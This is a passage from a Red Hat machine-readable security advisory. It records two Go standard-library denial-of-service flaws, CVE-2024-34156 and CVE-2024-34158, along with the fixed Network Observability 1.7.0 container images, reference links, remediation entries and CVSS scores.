reliability and availability of services.", title: "Statement", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2024-34156", }, { category: "external", summary: "RHBZ#2310528", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2310528", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2024-34156", url: "https://www.cve.org/CVERecord?id=CVE-2024-34156", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2024-34156", url: "https://nvd.nist.gov/vuln/detail/CVE-2024-34156", }, { category: "external", summary: "https://go.dev/cl/611239", url: "https://go.dev/cl/611239", }, { category: "external", summary: "https://go.dev/issue/69139", url: "https://go.dev/issue/69139", }, { category: "external", summary: "https://groups.google.com/g/golang-dev/c/S9POB9NCTdk", url: "https://groups.google.com/g/golang-dev/c/S9POB9NCTdk", }, { category: "external", summary: "https://pkg.go.dev/vuln/GO-2024-3106", url: "https://pkg.go.dev/vuln/GO-2024-3106", }, ], release_date: "2024-09-06T21:15:12.020000+00:00", remediations: [ { category: "vendor_fix", date: "2024-10-22T01:05:39+00:00", details: "For details on how to apply this update, refer to: \n\nhttps://access.redhat.com/articles/11258", product_ids: [ "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2024:8014", }, { category: "workaround", details: "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.", product_ids: [ "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le", ], }, ], scores: [ { cvss_v3: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "HIGH", baseScore: 7.5, baseSeverity: "HIGH", confidentialityImpact: "NONE", integrityImpact: "NONE", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", version: "3.1", }, products: [ "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le", ], }, ], threats: [ { category: "impact", details: "Important", }, ], title: "encoding/gob: golang: Calling Decoder.Decode on a message which contains deeply nested structures can cause a panic due to stack exhaustion", }, { cve: "CVE-2024-34158", cwe: { id: "CWE-1325", name: "Improperly Controlled Sequential Memory Allocation", }, discovery_date: "2024-09-06T21:20:12.126400+00:00", ids: [ { system_name: "Red Hat Bugzilla ID", text: "2310529", }, ], notes: [ { category: "description", text: "A flaw was found in the go/build/constraint package of the Golang standard library. Calling Parse on a \"// +build\" build tag line with deeply nested expressions can cause a panic due to stack exhaustion.", title: "Vulnerability description", }, { category: "summary", text: "go/build/constraint: golang: Calling Parse on a \"// +build\" build tag line with deeply nested expressions can cause a panic due to stack exhaustion", title: "Vulnerability summary", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2024-34158", }, { category: "external", summary: "RHBZ#2310529", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2310529", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2024-34158", url: "https://www.cve.org/CVERecord?id=CVE-2024-34158", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2024-34158", url: "https://nvd.nist.gov/vuln/detail/CVE-2024-34158", }, { category: "external", summary: "https://go.dev/cl/611240", url: "https://go.dev/cl/611240", }, { category: "external", summary: "https://go.dev/issue/69141", url: "https://go.dev/issue/69141", }, { category: "external", summary: "https://groups.google.com/g/golang-dev/c/S9POB9NCTdk", url: "https://groups.google.com/g/golang-dev/c/S9POB9NCTdk", }, { category: "external", summary: "https://pkg.go.dev/vuln/GO-2024-3107", url: "https://pkg.go.dev/vuln/GO-2024-3107", }, ], release_date: "2024-09-06T21:15:12.083000+00:00", remediations: [ { category: "vendor_fix", date: "2024-10-22T01:05:39+00:00", details: "For details on how to apply this update, refer to: \n\nhttps://access.redhat.com/articles/11258", product_ids: [ "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x", 